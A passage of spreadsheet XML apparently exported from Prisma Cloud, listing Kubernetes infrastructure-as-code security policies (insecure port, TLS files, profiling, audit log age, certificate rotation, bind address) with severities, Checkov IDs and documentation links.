      <c r="W1175" t="inlineStr">
        <is>
          <t>Ensure that the --insecure-port argument is set to 0</t>
        </is>
      </c>
      <c r="X1175" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-insecure-port-argument-is-set-to-0</t>
        </is>
      </c>
      <c r="Y1175" t="inlineStr"/>
      <c r="Z1175" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1175" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1175" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1175" t="inlineStr">
        <is>
          <t>CKV_K8S_88</t>
        </is>
      </c>
      <c r="AD1175" t="b">
        <v>1</v>
      </c>
      <c r="AE1175" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1175" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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5" t="inlineStr">
        <is>
          <t>2536bc15-b47e-4ec7-a215-1193012cb39c</t>
        </is>
      </c>
      <c r="AI1175" t="inlineStr"/>
      <c r="AJ1175" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1175" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1176">
      <c r="A1176" t="inlineStr"/>
      <c r="B1176" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1176" s="2" t="inlineStr"/>
      <c r="D1176" t="inlineStr"/>
      <c r="E1176" t="inlineStr"/>
      <c r="F1176" t="inlineStr"/>
      <c r="G1176" t="b">
        <v>1</v>
      </c>
      <c r="H11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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1176" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1176" t="inlineStr">
        <is>
          <t>The --tls-cert-file and --tls-private-key-file arguments for Kubelet are not set appropriately</t>
        </is>
      </c>
      <c r="L1176" t="inlineStr"/>
      <c r="M1176" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1176" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1176" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1176" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1176" t="inlineStr"/>
      <c r="R1176" t="inlineStr"/>
      <c r="S1176" t="inlineStr"/>
      <c r="T1176" t="b">
        <v>0</v>
      </c>
      <c r="U1176" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1176" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="W1176" t="inlineStr">
        <is>
          <t>Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate for Kubelet</t>
        </is>
      </c>
      <c r="X1176" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-tls-cert-file-and-tls-private-key-file-arguments-are-set-as-appropriate-for-kubelet</t>
        </is>
      </c>
      <c r="Y1176" t="inlineStr"/>
      <c r="Z1176" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1176" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1176" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1176" t="inlineStr">
        <is>
          <t>CKV_K8S_148</t>
        </is>
      </c>
      <c r="AD1176" t="b">
        <v>1</v>
      </c>
      <c r="AE1176" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1176" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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6" t="inlineStr">
        <is>
          <t>2d52b41d-84d8-4afc-8533-50053491e28f</t>
        </is>
      </c>
      <c r="AI1176" t="inlineStr"/>
      <c r="AJ1176" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1176" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1177">
      <c r="A1177" t="inlineStr"/>
      <c r="B1177" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1177" s="2" t="inlineStr"/>
      <c r="D1177" t="inlineStr"/>
      <c r="E1177" t="inlineStr"/>
      <c r="F1177" t="inlineStr"/>
      <c r="G1177" t="b">
        <v>1</v>
      </c>
      <c r="H11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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1177" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1177" t="inlineStr">
        <is>
          <t>The --make-iptables-util-chains argument is not set to True</t>
        </is>
      </c>
      <c r="L1177" t="inlineStr"/>
      <c r="M1177" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1177" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1177" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1177" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1177" t="inlineStr"/>
      <c r="R1177" t="inlineStr"/>
      <c r="S1177" t="inlineStr"/>
      <c r="T1177" t="b">
        <v>0</v>
      </c>
      <c r="U1177" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1177" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="W1177" t="inlineStr">
        <is>
          <t>Ensure that the --make-iptables-util-chains argument is set to true</t>
        </is>
      </c>
      <c r="X1177" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-make-iptables-util-chains-argument-is-set-to-true</t>
        </is>
      </c>
      <c r="Y1177" t="inlineStr"/>
      <c r="Z1177" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1177" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1177" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1177" t="inlineStr">
        <is>
          <t>CKV_K8S_145</t>
        </is>
      </c>
      <c r="AD1177" t="b">
        <v>1</v>
      </c>
      <c r="AE1177" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1177" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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7" t="inlineStr">
        <is>
          <t>f85287d7-5df4-4e40-bdb0-ddf4854be1e5</t>
        </is>
      </c>
      <c r="AI1177" t="inlineStr"/>
      <c r="AJ1177" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1177" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1178">
      <c r="A1178" t="inlineStr"/>
      <c r="B1178" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1178" s="2" t="inlineStr"/>
      <c r="D1178" t="inlineStr"/>
      <c r="E1178" t="inlineStr"/>
      <c r="F1178" t="inlineStr"/>
      <c r="G1178" t="b">
        <v>1</v>
      </c>
      <c r="H11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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1178" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1178" t="inlineStr">
        <is>
          <t>The --profiling argument is not set to false for API server</t>
        </is>
      </c>
      <c r="L1178" t="inlineStr"/>
      <c r="M1178" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1178" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1178" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1178" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1178" t="inlineStr"/>
      <c r="R1178" t="inlineStr"/>
      <c r="S1178" t="inlineStr"/>
      <c r="T1178" t="b">
        <v>0</v>
      </c>
      <c r="U1178" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1178" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="W1178" t="inlineStr">
        <is>
          <t>Ensure that the --profiling argument is set to false</t>
        </is>
      </c>
      <c r="X1178" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-profiling-argument-is-set-to-false-2</t>
        </is>
      </c>
      <c r="Y1178" t="inlineStr"/>
      <c r="Z1178" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1178" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1178" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1178" t="inlineStr">
        <is>
          <t>CKV_K8S_90</t>
        </is>
      </c>
      <c r="AD1178" t="b">
        <v>1</v>
      </c>
      <c r="AE1178" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1178" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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8" t="inlineStr">
        <is>
          <t>2fa82602-23c7-4cfc-8b78-56743c4b89f4</t>
        </is>
      </c>
      <c r="AI1178" t="inlineStr"/>
      <c r="AJ1178" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1178" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1179">
      <c r="A1179" t="inlineStr"/>
      <c r="B1179" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1179" s="2" t="inlineStr"/>
      <c r="D1179" t="inlineStr"/>
      <c r="E1179" t="inlineStr"/>
      <c r="F1179" t="inlineStr"/>
      <c r="G1179" t="b">
        <v>1</v>
      </c>
      <c r="H11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79" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1179" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1179" t="inlineStr">
        <is>
          <t>The --audit-log-maxage argument is not set appropriately</t>
        </is>
      </c>
      <c r="L1179" t="inlineStr"/>
      <c r="M1179" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1179" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1179" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1179" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1179" t="inlineStr"/>
      <c r="R1179" t="inlineStr"/>
      <c r="S1179" t="inlineStr"/>
      <c r="T1179" t="b">
        <v>0</v>
      </c>
      <c r="U1179" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1179" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="W1179" t="inlineStr">
        <is>
          <t>Ensure that the --audit-log-maxage argument is set to 30 or as appropriate</t>
        </is>
      </c>
      <c r="X1179" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-audit-log-maxage-argument-is-set-to-30-or-as-appropriate</t>
        </is>
      </c>
      <c r="Y1179" t="inlineStr"/>
      <c r="Z1179" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1179" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1179" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1179" t="inlineStr">
        <is>
          <t>CKV_K8S_92</t>
        </is>
      </c>
      <c r="AD1179" t="b">
        <v>1</v>
      </c>
      <c r="AE1179" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1179" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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79" t="inlineStr">
        <is>
          <t>8948f1c0-0207-4d94-99f3-f692a951cbb7</t>
        </is>
      </c>
      <c r="AI1179" t="inlineStr"/>
      <c r="AJ1179" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1179" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1180">
      <c r="A1180" t="inlineStr"/>
      <c r="B1180" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1180" s="2" t="inlineStr"/>
      <c r="D1180" t="inlineStr"/>
      <c r="E1180" t="inlineStr"/>
      <c r="F1180" t="inlineStr"/>
      <c r="G1180" t="b">
        <v>1</v>
      </c>
      <c r="H11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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1180" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1180" t="inlineStr">
        <is>
          <t>The --rotate-certificates argument is set to false</t>
        </is>
      </c>
      <c r="L1180" t="inlineStr"/>
      <c r="M1180" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1180" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1180" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1180" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1180" t="inlineStr"/>
      <c r="R1180" t="inlineStr"/>
      <c r="S1180" t="inlineStr"/>
      <c r="T1180" t="b">
        <v>0</v>
      </c>
      <c r="U1180" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1180" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="W1180" t="inlineStr">
        <is>
          <t>Ensure that the --rotate-certificates argument is not set to false</t>
        </is>
      </c>
      <c r="X1180" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-rotate-certificates-argument-is-not-set-to-false</t>
        </is>
      </c>
      <c r="Y1180" t="inlineStr"/>
      <c r="Z1180" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1180" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1180" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1180" t="inlineStr">
        <is>
          <t>CKV_K8S_149</t>
        </is>
      </c>
      <c r="AD1180" t="b">
        <v>1</v>
      </c>
      <c r="AE1180" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1180" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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0" t="inlineStr">
        <is>
          <t>82c6e27a-d022-4cd7-a277-49945c706c14</t>
        </is>
      </c>
      <c r="AI1180" t="inlineStr"/>
      <c r="AJ1180" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1180" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1181">
      <c r="A1181" t="inlineStr"/>
      <c r="B1181" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1181" s="2" t="inlineStr"/>
      <c r="D1181" t="inlineStr"/>
      <c r="E1181" t="inlineStr"/>
      <c r="F1181" t="inlineStr"/>
      <c r="G1181" t="b">
        <v>1</v>
      </c>
      <c r="H11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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1181" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1181" t="inlineStr">
        <is>
          <t>The --event-qps argument is not set to a level that ensures appropriate event capture</t>
        </is>
      </c>
      <c r="L1181" t="inlineStr"/>
      <c r="M1181" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1181" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1181" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1181" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1181" t="inlineStr"/>
      <c r="R1181" t="inlineStr"/>
      <c r="S1181" t="inlineStr"/>
      <c r="T1181" t="b">
        <v>0</v>
      </c>
      <c r="U1181" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1181" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="W1181" t="inlineStr">
        <is>
          <t>Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture</t>
        </is>
      </c>
      <c r="X1181" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-event-qps-argument-is-set-to-0-or-a-level-which-ensures-appropriate-event-capture</t>
        </is>
      </c>
      <c r="Y1181" t="inlineStr"/>
      <c r="Z1181" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1181" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1181" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1181" t="inlineStr">
        <is>
          <t>CKV_K8S_147</t>
        </is>
      </c>
      <c r="AD1181" t="b">
        <v>1</v>
      </c>
      <c r="AE1181" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1181" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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1" t="inlineStr">
        <is>
          <t>8b6e2702-e548-4c22-a41c-0e29662635af</t>
        </is>
      </c>
      <c r="AI1181" t="inlineStr"/>
      <c r="AJ1181" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1181" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1182">
      <c r="A1182" t="inlineStr"/>
      <c r="B1182" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1182" s="2" t="inlineStr"/>
      <c r="D1182" t="inlineStr"/>
      <c r="E1182" t="inlineStr"/>
      <c r="F1182" t="inlineStr"/>
      <c r="G1182" t="b">
        <v>1</v>
      </c>
      <c r="H11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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1182" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1182" t="inlineStr">
        <is>
          <t>The --bind-address argument is not set to 127.0.0.1</t>
        </is>
      </c>
      <c r="L1182" t="inlineStr"/>
      <c r="M1182" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1182" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1182" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1182" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1182" t="inlineStr"/>
      <c r="R1182" t="inlineStr"/>
      <c r="S1182" t="inlineStr"/>
      <c r="T1182" t="b">
        <v>0</v>
      </c>
      <c r="U1182" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1182" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="W1182" t="inlineStr">
        <is>
          <t>Ensure that the --bind-address argument is set to 127.0.0.1</t>
        </is>
      </c>
      <c r="X1182" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-bind-address-argument-is-set-to-127001-1</t>
        </is>
      </c>
      <c r="Y1182" t="inlineStr"/>
      <c r="Z1182" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1182" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1182" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1182" t="inlineStr">
        <is>
          <t>CKV_K8S_115</t>
        </is>
      </c>
      <c r="AD1182" t="b">
        <v>1</v>
      </c>
      <c r="AE1182" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1182" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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2" t="inlineStr">
        <is>
          <t>2484b8cc-2549-4ef3-ad63-3188d6a2013b</t>
        </is>
      </c>
      <c r="AI1182" t="inlineStr"/>
      <c r="AJ1182" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1182" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1183">
      <c r="A1183" t="inlineStr"/>
      <c r="B1183" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1183" s="2" t="inlineStr"/>
      <c r="D1183" t="inlineStr"/>
      <c r="E1183" t="inlineStr"/>
      <c r="F1183" t="inlineStr"/>
      <c r="G1183" t="b">
        <v>1</v>
      </c>
      <c r="H11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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1183" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1183" t="inlineStr">
        <is>
          <t>The --tls-cert-file and --tls-private-key-file arguments for API server are not set appropriately</t>
        </is>
      </c>
      <c r="L1183" t="inlineStr"/>
      <c r="M1183" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1183" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1183" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1183" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1183" t="inlineStr"/>
      <c r="R1183" t="inlineStr"/>
      <c r="S1183" t="inlineStr">
        <is>
          <t>Policy Status Review</t>
        </is>
      </c>
      <c r="T1183" t="b">
        <v>0</v>
      </c>
      <c r="U1183" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1183" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="W1183" t="inlineStr">
        <is>
          <t>Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate</t>
        </is>
      </c>
      <c r="X1183" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-tls-cert-file-and-tls-private-key-file-arguments-are-set-as-appropriate</t>
        </is>
      </c>
      <c r="Y1183" t="inlineStr"/>
      <c r="Z1183" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1183" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1183" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1183" t="inlineStr">
        <is>
          <t>CKV_K8S_100</t>
        </is>
      </c>
      <c r="AD1183" t="b">
        <v>1</v>
      </c>
      <c r="AE1183" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1183" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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3" t="inlineStr">
        <is>
          <t>00a6ace3-35ea-4d46-9814-221875ffcd47</t>
        </is>
      </c>
      <c r="AI1183" t="inlineStr"/>
      <c r="AJ1183" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1183" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1184">
      <c r="A1184" t="inlineStr"/>
      <c r="B1184" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1184" s="2" t="inlineStr"/>
      <c r="D1184" t="inlineStr"/>
      <c r="E1184" t="inlineStr"/>
      <c r="F1184" t="inlineStr"/>
      <c r="G1184" t="b">
        <v>1</v>
      </c>
      <c r="H11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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1184" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1184" t="inlineStr">
        <is>
          <t>The --auto-tls argument is set to True</t>
        </is>
      </c>
      <c r="L1184" t="inlineStr"/>
      <c r="M1184" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1184" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1184" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1184" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1184" t="inlineStr"/>
      <c r="R1184" t="inlineStr"/>
      <c r="S1184" t="inlineStr"/>
      <c r="T1184" t="b">
        <v>0</v>
      </c>
      <c r="U1184" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1184" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="W1184" t="inlineStr">
        <is>
          <t>Ensure that the --auto-tls argument is not set to true</t>
        </is>
      </c>
      <c r="X1184" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-auto-tls-argument-is-not-set-to-true</t>
        </is>
      </c>
      <c r="Y1184" t="inlineStr"/>
      <c r="Z1184" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1184" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1184" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1184" t="inlineStr">
        <is>
          <t>CKV_K8S_118</t>
        </is>
      </c>
      <c r="AD1184" t="b">
        <v>1</v>
      </c>
      <c r="AE1184" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1184" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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4" t="inlineStr">
        <is>
          <t>253fcd41-e93f-479e-9176-2d8062e9e0d8</t>
        </is>
      </c>
      <c r="AI1184" t="inlineStr"/>
      <c r="AJ1184" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1184" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1185">
      <c r="A1185" t="inlineStr"/>
      <c r="B1185" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1185" s="2" t="inlineStr"/>
      <c r="D1185" t="inlineStr"/>
      <c r="E1185" t="inlineStr"/>
      <c r="F1185" t="inlineStr"/>
      <c r="G1185" t="b">
        <v>1</v>
      </c>
      <c r="H11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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1185" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1185" t="inlineStr">
        <is>
          <t>The admission control plugin NamespaceLifecycle is not set</t>
        </is>
      </c>
      <c r="L1185" t="inlineStr"/>
      <c r="M1185" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1185" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1185" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1185" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1185" t="inlineStr"/>
      <c r="R1185" t="inlineStr"/>
      <c r="S1185" t="inlineStr"/>
      <c r="T1185" t="b">
        <v>0</v>
      </c>
      <c r="U1185" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1185" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="W1185" t="inlineStr">
        <is>
